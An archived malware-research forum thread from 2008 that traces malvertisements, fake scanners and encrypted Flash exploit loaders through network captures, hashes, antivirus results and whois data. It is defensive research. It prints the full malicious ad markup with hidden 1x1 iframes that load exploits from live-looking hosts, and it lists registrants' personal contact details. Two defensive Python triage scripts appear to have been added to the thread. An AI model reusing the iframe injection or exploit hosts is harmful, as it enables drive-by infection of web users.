Full Version: Flash Mystery
B.I.S.S. Forums > Malware News, Research & Removal > Malware Playground
Kimberly

Updated Shockwave / Flash exploit


Remember I mentioned a different way to exploit redirects a couple of days ago and the Shockwave exploit covered by Kaspersky?

Well, it all started last night when I got a popup for a fake online scanner without seeing a Flash malvertizement. So I had to dig a bit further, as usual. Going back to the site and stumbling on the same advertisement revealed something interesting in the network capture ... an encoded / obfuscated script as seen below. It might not be the exact source of the fake scanner, as I didn't get redirected at the time of the write-up. It remains captivating though, as it covers yet another aspect of malicious ActionScript used in Flash content.
Since I'm curious, I feel the need to decode when possible and what a nifty surprise when I discovered that the script does test which Flash version is installed and leads to a tiny swf file named july1st-firefox-intro.swf.
Inside july1st-firefox-intro.swf we discover 4 important strings:
CODE
String
value: /:$version
String
value: http://202.75.35.72/h/ff/
String
value: i.swf
String
value: _root
Seeing those strings, I realized I had stumbled on the exploit mentioned in the Kaspersky blog. Further analysis of the file shows that an evolution in obfuscation has taken place. The ActionScript code has been encrypted to better hide the code from researchers.
The initial swf file doesn't have any images either as seen below, just 1 frame and the obfuscated actionscript.
Upon "execution", the value of the Flash Player is added to the i.swf, being WIN 9,0,47,0 for me.
july1st-firefox-intro.swf is part of a bigger "hijack" by adverts. For more information on the main exe file, please refer to Trojan-Downloader.Win32.Firu.al. The Flash exploit has been added to the infection discovered a couple of days ago.
  1. Banner to be displayed: 247mediadirect.com/ad/images/468x60/40381.gif
  2. exe file: script at 247mediadirect.com/jh/f.php?id=9600 which leads to exe
  3. swf file: script at 202.75.35.72/z?i=1&n=6f743fe3724e01adbd202e04be8109e9&t=1215589262
CODE
<HTML><BODY><A HREF="http://247mediadirect.com/action/1/9600/98" TARGET="_blank"><IMG SRC="http://247mediadirect.com/ad/images/468x60/40381.gif"></A><iframe src="http://247mediadirect.com/jh/f.php?id=9600"  frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe></BODY></HTML><iframe src="http://202.75.35.72/z?i=1&n=6f743fe3724e01adbd202e04be8109e9&t=1215589262"  frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe>

File details


Filename: july1st-firefox-intro.swf

File size: 1332 bytes
MD5...: 47e99b0f5c97e6208d7bab6fa5be8991
SHA1..: 325de729cae0fed62fe47a78bcd9270c31308056
SHA256: cf98da052701fbcaa824f4b489379a6ec5c85237eebba8b8b1499b07ecb21681
PEiD..: -
QUOTE
File july1st-firefox-intro.swf received on 07.09.2008 01:55:09 (CET)
AhnLab-V3 2008.7.9.0 2008.07.08 -
AntiVir 7.8.0.64 2008.07.08 -
Authentium 5.1.0.4 2008.07.08 -
Avast 4.8.1195.0 2008.07.08 SWF:Downloader
AVG 7.5.0.516 2008.07.08 -
BitDefender 7.2 2008.07.08 -
CAT-QuickHeal 9.50 2008.07.08 -
ClamAV 0.93.1 2008.07.09 -
DrWeb 4.44.0.09170 2008.07.08 -
eSafe 7.0.17.0 2008.07.08 -
eTrust-Vet 31.6.5937 2008.07.08 -
Ewido 4.0 2008.07.08 -
F-Prot 4.4.4.56 2008.07.08 -
F-Secure 7.60.13501.0 2008.07.08 -
Fortinet 3.14.0.0 2008.07.08 -
GData 2.0.7306.1023 2008.07.08 SWF:Downloader
Ikarus T3.1.1.26.0 2008.07.09 -
Kaspersky 7.0.0.125 2008.07.09 -
McAfee 5334 2008.07.08 -
Microsoft 1.3704 2008.07.09 -
NOD32v2 3252 2008.07.08 -
Norman 5.80.02 2008.07.08 -
Panda 9.0.0.4 2008.07.08 -
Prevx1 V2 2008.07.09 -
Rising 20.52.12.00 2008.07.08 -
Sophos 4.31.0 2008.07.08 -
Sunbelt 3.1.1509.1 2008.07.04 -
Symantec 10 2008.07.09 -
TheHacker 6.2.96.374 2008.07.07 -
TrendMicro 8.700.0.1004 2008.07.08 -
VBA32 3.12.6.8 2008.07.08 -
VirusBuster 4.5.11.0 2008.07.08 -
Webwasher-Gateway 6.6.2 2008.07.08 -
Kimberly

Updated Shockwave / Flash exploit


Some fascinating background information about 247mediadirect.com & 202.75.35.72 is available on Sandi's blog.

FIFTH malvertizement on iEUROP Group : ifrance - isuisse - ibelgique.com - iquebec.com - iespana.es - iitalia.com


Incredible, isn't it? Another malvertizement featuring MediaMan is present:
  • on the main page of isuisse & iquebec
  • on the websites hosted on ibelgique & ifrance
How is this possible? I just can't believe it. I got hit by it just after the Forex AutoPilot malvert, which is still rotating too.

Screenshot in situ.
Banner.
image.ifrance.com/img/pub/atlantmedia/imediaman728x90.swf
Campaign.
statgroup.net/crossdomain.xml
statgroup.net/c/index.php?id=[removed]

profitabill.com/?cmpid=asbarrator
profitabill.com/?cmpid=asbarrator ... This is the same link as seen in the XM Radio malvertizement. Another interesting point: I think imediaman728x90.swf has been acquired very recently by iEUROP, the date being 9th of July 2008 - 6:12 PM
Very often we notice that websites leave the advertiser's name as a folder's name on their server. Here we see a mention of atlantmedia, so that deserves some digging.

Atlant Media


atlantmedia.net - 87.251.53.87

Website Title: Atlant Media
ICANN Registrar: TLDS, LLC DBA SRSPLUS
Created: 2008-04-14
Expires: 2009-04-14
Updated: 2008-05-16
Name Server: NS1.ATLANTMEDIA.NET (has 1 domains) - 208.79.82.50
Name Server: NS2.ATLANTMEDIA.NET - 208.79.82.66
Name Server: NS3.ATLANTMEDIA.NET - 77.73.98.2
Name Server: NS4.ATLANTMEDIA.NET - 77.73.98.4
Whois Server: whois.srsplus.com

Server Type: Apache/2.2.3 (Debian)
IP Address: 87.251.53.87
IP Location - Netherlands - Bit
Dedicated Hosting: atlantmedia.net is hosted on a dedicated server.

Registrant:
Samanta Lipton (mail@atlantmedia.net)
6 South Avenue
Kingston, NONE 0121
JM
876 920 8447

Domain Name: atlantmedia.net


Domain Service Provider:
SoftSolutions Inc

Regular readers will already have noticed the NS servers, which are well known to us. The rest is self-explanatory.

Domains sharing nameservers.
No doubt, Atlant Media is yet another dodgy, bad advertising company. If you have been approached by people representing them, please check your creatives at Adopstools or contact us.

Circulating malvertizements


Courtesy of Sandi.

Classmates.
More info.
______________________________

Skype.
More info.
Kimberly

Warning


The bad guys are pulling off a new stunt when you are the victim of a redirect. Everyone has used copy and paste at least once in his / her life to pass links into the browser. Upon the redirect, one of the bad URLs is copied into your clipboard. So let's presume that just before it happened you had a website link in your clipboard, the redirect happens, you close all your windows with ALT+F4 and you decide to go back to the initial website using the paste function ... Wrong, because you now have a bad URL in your clipboard.
How to get rid of it quickly?
  1. Click Start > Run
  2. In the edit box type clipbrd followed by enter.
  3. The actual content of the clipboard will be displayed.
  4. Click the delete button and confirm by Yes.
Furthermore I did notice that they had wiped isuisse.com (where the redirect did occur) from my Internet History list.
Kimberly

Malvertizements - Another way of spreading


Ever wondered why so many malicious banners are lying around on the Internet? Well, here is another method of spreading malvertizements. The banner is 1 year old (which gives an idea of how long these redirects have been going on already) ... it's the method used by those scammers that is disgusting.

You love Myspace / Xanga / Friendster / Hi5 stuff? Let's head towards www.funmunch.com then. See the Myspace Banners link?
When clicked, you are taken to the banner directory and wow a Flash file ...
Banner.
www.funmunch.com/banners/media.swf
Adopstools Test.
http://www.adopstools.com/index.asp?page=quicklink&id=2907h69B4n4rNAc1
Before using Flash banners on your MySpace profile (or elsewhere) check if they are clean at Adops Tools!!!
Kimberly

Circulating malvertizements


Courtesy of Sandi.

Dreammates.

Campaign.
page2.googiesindication.com/c/index.php?id=[removed]
waytotheprofit.com/?cmpid=noanalysis&adid=intl
More info.
______________________________

Much Music.
Campaign.
statgroup.net/c/index.php?id=[removed]
waytotheprofit.com/?cmpid=ontitivate&adid=intl
More info.
Kimberly

New kidz on the block


Two new friends of our well known adtds.trackads.net / adtds2.promoplexer.com domains are active.

internetsecuritydeluxe.com - 67.205.75.12
CODE
GET /in.cgi?22 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adtds.trackads.net
Connection: Keep-Alive

HTTP/1.1 302 Found
Set-Cookie: SL_22_0000=_2_; domain=adtds2.promoplexer.com; path=/; expires=Tue, 15-Jul-2008 23:35:33 GMT
Location: http://internetsecuritydeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1
Content-type: text/html
Content-Length: 294
Date: Mon, 14 Jul 2008 23:35:33 GMT
Server: lighttpd/1.5.0

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://internetsecuritydeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1'">
</head>
<body>
document moved <a href="http://internetsecuritydeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1">here</a>
</body>
</html>
Website Title: .: InternetSecurityDeluxe - the best antispyware, antimalware ever :.

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-04-22
Expires: 2009-04-22
Updated: 2008-06-27
Name Server: NS.INTERNETSECURITYDELUXE.COM (has 1 domains)
Name Server: NS1.INTERNETSECURITYDELUXE.COM
Name Server: NS2.INTERNETSECURITYDELUXE.COM
Whois Server: whois.estdomains.com

Server Type: lighttpd/1.4.18
IP Address: 67.205.75.12
IP Location - Ukraine - Individual

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: INTERNETSECURITYDELUXE.COM

Registrant:
Ind
Vasil pentykovich (leonardo126@gmail.com)
Ny tipa normalnij address
Shoblo
Other,20365
PR
Tel. +023.2569856
Fax. +023.5565599

______________________________

scanner.vav-scan.com / *.vav-scan.com - 92.241.182.16
CODE
GET /in.cgi?2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adtds.trackads.net
Connection: Keep-Alive

HTTP/1.1 302 Found
Set-Cookie: SL_2_0000=_6_; domain=adtds2.promoplexer.com; path=/; expires=Tue, 15-Jul-2008 23:38:30 GMT
Set-Cookie: SL_12_0000=_3_; domain=adtds2.promoplexer.com; path=/; expires=Tue, 15-Jul-2008 23:38:30 GMT
Location: http://scanner.vav-scan.com/29/?advid=4925&ref=&p=1000000000
Content-type: text/html
Content-Length: 248
Date: Mon, 14 Jul 2008 23:38:30 GMT
Server: lighttpd/1.5.0

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://scanner.vav-scan.com/29/?advid=4925&ref=&p=1000000000'">
</head>
<body>
document moved <a href="http://scanner.vav-scan.com/29/?advid=4925&ref=&p=1000000000">here</a>
</body>
</html>
Website Title: Welcome to nginx!

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-05-28
Expires: 2009-05-28
Updated: 2008-07-14
Name Server: NS1.VAV-SCAN.COM (has 1 domains)
Name Server: NS2.VAV-SCAN.COM
Whois Server: whois.estdomains.com

IP Address: 92.241.182.16
IP Location - Russian Federation - Wahome Colocation

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: VAV-SCAN.COM

Registrant:
Sawert Alliance ltd.
Leonid Sherbakov (selevitenterprises@gmail.com)
P.O. Box 3567, Road Town
Tortola
Not Applicable,N/A
VG
Tel. +7.9602578790


Websites.
  1. Vav-scan.com
  2. Vav-scanner.com
  3. Vavscan.com
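The in.cgi hops captured above (a 302 whose Location, meta refresh and body link all point at the fake scanner, with the cookie scoped to the sibling adtds2 domain) can be checked mechanically. The script below is an added example, not code from the thread or from any of the parties it names; the capture it parses is a constructed sample with placeholder hostnames (tds.example.net, tds2.example.org, scanner.example.com) shaped like the ones in the post.

```python
import re
from urllib.parse import urlparse

# Constructed sample with placeholder hostnames, shaped like the in.cgi captures in the post.
SAMPLE_CAPTURE = """GET /in.cgi?22 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tds.example.net
Connection: Keep-Alive

HTTP/1.1 302 Found
Set-Cookie: SL_22_0000=_2_; domain=tds2.example.org; path=/; expires=Tue, 15-Jul-2008 23:35:33 GMT
Location: http://scanner.example.com/scanner/scan.php?landid=2&bs=1
Content-type: text/html
Content-Length: 294
Server: lighttpd/1.5.0

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://scanner.example.com/scanner/scan.php?landid=2&bs=1'">
</head>
<body>
document moved <a href="http://scanner.example.com/scanner/scan.php?landid=2&bs=1">here</a>
</body>
</html>
"""

META_REFRESH_RE = re.compile(r"""content=["']\s*\d+\s*;\s*url=['"]?([^'"]+)""", re.I)
HREF_RE = re.compile(r"""href=["']([^"']+)""", re.I)
COOKIE_DOMAIN_RE = re.compile(r"domain=([^;]+)", re.I)


def parse_headers(block: str) -> tuple:
    """Split a request or response block into its start line and (name, value) pairs."""
    lines = block.strip().split("\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def parse_exchange(capture: str) -> dict:
    """Extract host, status, Location, cookie domains and in-body redirect targets."""
    text = capture.replace("\r\n", "\n")
    req_block, resp_block, body = text.split("\n\n", 2)   # request, response headers, body
    req_line, req_headers = parse_headers(req_block)
    status_line, resp_headers = parse_headers(resp_block)
    _method, path, _version = req_line.split(" ", 2)
    cookie_domains = []
    for name, value in resp_headers:
        match = COOKIE_DOMAIN_RE.search(value) if name == "set-cookie" else None
        if match:
            cookie_domains.append(match.group(1).strip().lower().lstrip("."))
    meta = META_REFRESH_RE.search(body)
    return {
        "host": dict(req_headers).get("host", "").lower(),
        "path": path,
        "status": int(status_line.split(" ")[1]),
        "location": dict(resp_headers).get("location"),
        "cookie_domains": cookie_domains,
        "meta_refresh": meta.group(1) if meta else None,
        "hrefs": HREF_RE.findall(body),
    }


def redirect_findings(ex: dict) -> list:
    """Heuristics for one TDS hop, in the order a responder would read the capture."""
    findings = []
    targets = {u for u in [ex["location"], ex["meta_refresh"], *ex["hrefs"]] if u}
    if 300 <= ex["status"] < 400 and ex["location"]:
        findings.append("%d from %s to %s" % (ex["status"], ex["host"], urlparse(ex["location"]).hostname))
    if ex["meta_refresh"] and len(targets) == 1:
        findings.append("Location, meta refresh and body link all push to the same URL")
    for domain in ex["cookie_domains"]:
        if domain != ex["host"]:   # cookie scoped to a sibling domain, not the host we talked to
            findings.append("cookie scoped to %s while the request went to %s" % (domain, ex["host"]))
    if re.match(r"/in\.cgi\?\d+$", ex["path"]):
        findings.append("in.cgi?<number> entry point: the numeric id selects the landing page")
    return findings


if __name__ == "__main__":
    for line in redirect_findings(parse_exchange(SAMPLE_CAPTURE)):
        print(line)
```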
Kimberly

Circulating malvertizements


Courtesy of Sandi.

Levi's.
More info.
______________________________

Lexus - myownpoursuit.com.
More info.
______________________________

Lady SpeedStick.

The original malvertizement has been replaced with a "cleaned" one already. We have seen this happen before when hosted on their own "advert servers".
More info.
______________________________

XM Radio.

Another sample of XM Radio featuring the same campaign as the one seen on ifrance & co.
More info.
Kimberly

Updated Shockwave / Flash exploit


Another Flash file, smaller than the one mentioned here because it is packed this time (packer according to Kaspersky: Swf2Swc), and a new domain, 21centmedia.com, which is serving the same exploits and redirects as 247mediadirect.com. Ref.

Again we see a script to decode.
Decoded we see again the same Flash test and a link to a tiny swf file named ff.swf.
Inside ff.swf we discover 4 important strings:
CODE
String
value: /:$version
String
value: http://209.47.164.209/h/ff/
String
value: swf
String
value: _root
The action script code has been encrypted again, ff.swf doesn't have any images either. Upon "execution", the value of the Flash Player is added to the swf, being WIN 9,0,47,0 for me.
Whoops, sloppy coders: they kinda messed up this one, since the dot is missing between the filename and the file extension.
CODE
GET /h/ff/WIN%209,0,47,0swf HTTP/1.1
Accept: */*
Referer: [removed]
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 209.47.164.209
Connection: Keep-Alive
Complete exploit:
CODE
<HTML><BODY><A HREF="http://21centmedia.com/route/1/5919/117" TARGET="_blank"><IMG SRC="http://21centmedia.com/banner/images/468x60/84489.jpg"></A><iframe src="http://21centmedia.com/xo/a.php?id=5919"  frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe></BODY></HTML><iframe src="http://209.47.164.209/z?i=1&n=4f6e8320e1ae5ca898cca282b69215e5&t=1216170914"  frameborder=0
marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe>

File details


Filename: ff.swf

File size: 764 bytes
MD5...: d8081ca147f2369b0862db2341e8aa0d
SHA1..: 0c07fb184060123006a1edb4587cfd040abc2ab4
SHA256: 51de9f0d310f933f5d92466a5bd754b50effc4b39c38a506d3a7ea2c8f8a6fa9
PEiD..: -
QUOTE
File ff.swf received on 07.16.2008 03:36:03 (CET)
AhnLab-V3 2008.7.11.0 2008.07.15 -
AntiVir 7.8.0.68 2008.07.15 -
Authentium 5.1.0.4 2008.07.15 -
Avast 4.8.1195.0 2008.07.15 SWF:Downloader
AVG 7.5.0.516 2008.07.15 -
BitDefender 7.2 2008.07.16 -
CAT-QuickHeal 9.50 2008.07.15 -
ClamAV 0.93.1 2008.07.16 -
DrWeb 4.44.0.09170 2008.07.15 -
eSafe 7.0.17.0 2008.07.15 -
eTrust-Vet 31.6.5956 2008.07.15 -
Ewido 4.0 2008.07.15 -
F-Prot 4.4.4.56 2008.07.15 -
F-Secure 7.60.13501.0 2008.07.16 -
Fortinet 3.14.0.0 2008.07.16 -
GData 2.0.7306.1023 2008.07.16 SWF:Downloader
Ikarus T3.1.1.26.0 2008.07.16 Virus.SWF.Downloader
Kaspersky 7.0.0.125 2008.07.15 -
McAfee 5339 2008.07.15 -
Microsoft 1.3704 2008.07.15 -
NOD32v2 3270 2008.07.15 -
Norman 5.80.02 2008.07.15 -
Panda 9.0.0.4 2008.07.15 -
Prevx1 V2 2008.07.16 -
Rising 20.53.12.00 2008.07.15 -
Sophos 4.31.0 2008.07.16 -
Sunbelt 3.1.1536.1 2008.07.15 -
Symantec 10 2008.07.16 -
TheHacker 6.2.96.381 2008.07.16 -
TrendMicro 8.700.0.1004 2008.07.15 -
VBA32 3.12.8.0 2008.07.15 -
VirusBuster 4.5.11.0 2008.07.15 -
Webwasher-Gateway 6.6.2 2008.07.16 -

21centmedia.com - 209.47.164.209


Same registrant as 247mediadirect.com.


Website Title: None given.
ICANN Registrar: INTERCOSMOS MEDIA GROUP, INC. D/B/A DIRECTNIC.COM
Created: 2008-05-29
Expires: 2009-05-29
Updated: 2008-05-29
Name Server: NS0.DIRECTNIC.COM (has 354,650 domains)
Name Server: NS1.DIRECTNIC.COM
Whois Server: whois.directnic.com

IP Address: 209.47.164.209
IP Location - United States - Mci Communications Services Inc. D/b/a Verizon Business
Dedicated Hosting: 21centmedia.com is hosted on a dedicated server.

Registrant:
Media Hosting Ltd.
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Domain Name: 21CENTMEDIA.COM

Administrative Contact:
Pearson, Ross
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830


Record expires on 05-29-2009
Record created on 05-29-2008

Domain servers in listed order:
NS0.DIRECTNIC.COM 69.46.233.245
NS1.DIRECTNIC.COM 69.46.234.245
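Both loader files in this thread (july1st-firefox-intro.swf and ff.swf) show the same fingerprint: one frame, no images, and four strings in the ActionScript (/:$version, a base URL, a file suffix, _root). The script below is an added example, not code from the thread, that extracts exactly those features from a small SWF: it inflates a CWS body, walks the tag list to count frames and image tags, pulls string constants out of DoAction bytecode (ActionConstantPool and ActionPush records) and flags the version-probe-plus-URL-plus-_root combination. build_sample_swf fabricates the test input; the 203.0.113.5 address in the test is a documentation placeholder, not the real host. Strings that an obfuscated file only assembles at runtime will not show up, so a clean report is not a clean file.

```python
import struct
import zlib

ACTION_TAGS = {12, 59}                   # DoAction / DoInitAction carry AVM1 bytecode
IMAGE_TAGS = {6, 20, 21, 35, 36, 90}     # DefineBits* / DefineBitsJPEG* / DefineBitsLossless*
PUSH_SIZES = {1: 4, 2: 0, 3: 0, 4: 1, 5: 1, 6: 8, 7: 4, 8: 1, 9: 2}  # non-string push payloads

def decompress_swf(data: bytes) -> bytes:
    """Return the body after the 8-byte header; FWS is stored, CWS is zlib-packed."""
    if data[:3] == b"FWS":
        return data[8:]
    if data[:3] == b"CWS":
        return zlib.decompress(data[8:])
    raise ValueError("unsupported SWF signature %r" % data[:3])

def parse_tags(body: bytes) -> tuple:
    """Walk the tag list that follows the RECT, FrameRate and FrameCount header fields."""
    nbits = body[0] >> 3                    # RECT begins with a 5-bit Nbits field
    pos = (5 + 4 * nbits + 7) // 8          # four Nbits-wide values, padded to a byte
    frame_count = struct.unpack_from("<H", body, pos + 2)[0]
    pos += 4                                # skip FrameRate (UI16) and FrameCount (UI16)
    tags = []
    while pos + 2 <= len(body):
        code_and_len = struct.unpack_from("<H", body, pos)[0]
        pos += 2
        code, length = code_and_len >> 6, code_and_len & 0x3F
        if length == 0x3F:                  # long header: explicit UI32 length follows
            length = struct.unpack_from("<I", body, pos)[0]
            pos += 4
        tags.append((code, body[pos:pos + length]))
        pos += length
        if code == 0:                       # End tag
            break
    return frame_count, tags

def action_strings(actions: bytes) -> list:
    """Collect string constants from ActionConstantPool (0x88) and ActionPush (0x96) records."""
    out, pos = [], 0
    while pos < len(actions):
        code = actions[pos]
        pos += 1
        if code == 0:                       # ActionEnd
            break
        if code < 0x80:                     # single-byte action without payload
            continue
        length = struct.unpack_from("<H", actions, pos)[0]
        payload = actions[pos + 2:pos + 2 + length]
        pos += 2 + length
        if code == 0x88:                    # UI16 count followed by null-terminated strings
            out.extend(s.decode("latin-1") for s in payload[2:].split(b"\x00")[:-1])
        if code != 0x96:
            continue
        i = 0
        while i < len(payload):             # one push may carry several typed values
            ptype = payload[i]
            i += 1
            if ptype == 0:                  # type 0: null-terminated string
                end = payload.index(b"\x00", i)
                out.append(payload[i:end].decode("latin-1"))
                i = end + 1
            else:
                i += PUSH_SIZES.get(ptype, len(payload))
    return out

def triage_swf(data: bytes) -> dict:
    """Report the features worth checking on a tiny loader SWF."""
    body = decompress_swf(data)
    frame_count, tags = parse_tags(body)
    strings = []
    for code, payload in tags:
        if code in ACTION_TAGS:
            strings.extend(action_strings(payload))
    urls = [s for s in strings if s.startswith(("http://", "https://"))]
    report = {
        "frames": frame_count,
        "image_tags": sum(1 for code, _ in tags if code in IMAGE_TAGS),
        "strings": strings,
        "urls": urls,
        "probes_version": "/:$version" in strings,
        "uses_root": "_root" in strings,
    }
    # The pattern from the posts: read the player version, build a URL from it, load via _root
    report["loader_pattern"] = report["probes_version"] and report["uses_root"] and bool(urls)
    return report

def build_sample_swf(strings: list, compressed: bool = True) -> bytes:
    """Constructed test input (not the real sample): a one-frame SWF with a single DoAction tag."""
    pushes = b""
    for s in strings:
        record = b"\x00" + s.encode("latin-1") + b"\x00"            # type 0 string record
        pushes += b"\x96" + struct.pack("<H", len(record)) + record
    pushes += b"\x00"                                                # ActionEnd
    do_action = struct.pack("<H", (12 << 6) | 0x3F) + struct.pack("<I", len(pushes)) + pushes
    body = b"\x00" + struct.pack("<H", 12 << 8) + struct.pack("<H", 1)  # RECT(Nbits=0), 12 fps, 1 frame
    body += do_action + struct.pack("<H", 1 << 6) + struct.pack("<H", 0)  # ShowFrame, End
    header = (b"CWS" if compressed else b"FWS") + b"\x09" + struct.pack("<I", 8 + len(body))
    return header + (zlib.compress(body) if compressed else body)
```

On a real file, read it with open(path, "rb").read() and pass the bytes to triage_swf; a report with loader_pattern set and image_tags at zero matches the two samples described in the posts.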
Kimberly

Updated TravelWise banner


Forwarded to us by a contact. The TravelWise malvertizement has been seen in the past in its 460x60 version on different occasions. Today a 728x90 version of this banner is circulating.

Banner.

Campaign.
stathisranch.com/c/index.php?id=[removed]
waytotheprofit.com/?cmpid=usboeotian&adid=intl
Kimberly

softtraf.com


adtds.trackads.net / adtds2.promoplexer.com have activated a new domain: softtraf.com
softtraf.com/go.php?id=[removed]
Depending on the id= people will get redirected to different fake online scanners. At Domain Tools, softtraf.com is still listed under 92.241.182.14 but the website actually resolves to 91.208.0.244.
scanner.vav-scan.com has been moved into that range also. We notice a couple of other domains that correspond to the id= redirects.

softtraf.com - 91.208.0.244

Registry Data
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-05-16
Expires: 2009-05-16
Updated: 2008-07-16
Registrar Status: ok
Name Server: ns1.softtraf.com 91.208.0.244
Name Server: ns2.softtraf.com 220.196.42.220
Whois Server: whois.estdomains.com

Whois Record
Domain Name: SOFTTRAF.COM

Registrant:
Sawert Alliance ltd.
Peltonen Martti (seodancer@gmail.com)
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266


Websites.
  1. Pornonod.com
  2. Softtraf.com
  3. Softtrafik.com
  4. Software-traff.com
  5. Software-traffic.com
  6. Softwaretraff.com

e-statistic.com


Found in a referer during a redirect to scanner.vavscan.com
CODE
GET /stats.php?site=[removed]&adv=[removed] HTTP/1.1
Accept: */*
Referer: http://scanner.vavscan.com/[removed]/[removed]
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: srv1.e-statistic.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.5.33
Date: Sat, 19 Jul 2008 16:28:08 GMT
Content-Type: image/gif
Transfer-Encoding: chunked
Connection: keep-alive

e-statistic.com - 207.226.175.78

Website Title: 403 Forbidden
Registry Data
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2007-12-05
Expires: 2008-12-05
Updated: 2008-02-07
Name Server: NS1.E-STATISTIC.COM (has 1 domains)
Name Server: NS2.E-STATISTIC.COM
Whois Server: whois.publicdomainregistry.com

Server Type: nginx/0.5.33
IP Address: 207.226.175.78
IP Location - Virginia - Mc Lean - Beyond The Network America Inc
Response Code: 403
Dedicated Hosting: e-statistic.com is hosted on a dedicated server.

Whois Record
Registration Service Provided By: VIVIDS MEDIA GMBH
Contact: +49.3094413291

Domain Name: E-STATISTIC.COM

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Kimberly

Exploiting redirects in Flash content


Today I spent some time reading network captures related to my recent rotator.adjuggler.com case and discovered 2 new swf files served through advertising.

Network traces.

We notice an advertisement on the main page of www.saazy.com
CODE
<div class="ad_300x250">
<!-- BEGIN 300X250 -->
<iframe width="300" height="250" noresize scrolling=No frameborder=0 marginheight=0 marginwidth=0 src="http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vh?z=terp517&dim=300757&pos=2">
<script language=javascript src="http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vj?z=terp517&dim=300757&pos=2&abr=$scriptiniframe"></script>
<noscript><a href="http://rotator.adjuggler.com/servlet/ajrotator/334223/0/cc?z=terp517&pos=2">
<img src="http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vc?z=terp517&dim=300757&pos=2&abr=$imginiframe" width="300" height="250" border="0">
</a></noscript></iframe>
<!-- END 300X250 -->
</div>
Let's follow the consecutive redirects ...
CODE
GET http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vh?z=terp517&dim=300757&pos=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.saazy.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: rotator.adjuggler.com
Proxy-Connection: Keep-Alive

CODE
GET http://count4.exitexchange.com/exit/1222876 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vh?z=terp517&dim=300757&pos=2
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: count4.exitexchange.com
Proxy-Connection: Keep-Alive

CODE
GET http://count4.exitexchange.com/exit/1159049?3387160 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://count4.exitexchange.com/exit/1222876
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: count4.exitexchange.com
Proxy-Connection: Keep-Alive

CODE
GET http://30.ath.cx/viewpost.php?pid=25 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://count4.exitexchange.com/exit/1159049?3387160
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Proxy-Connection: Keep-Alive
Host: 30.ath.cx
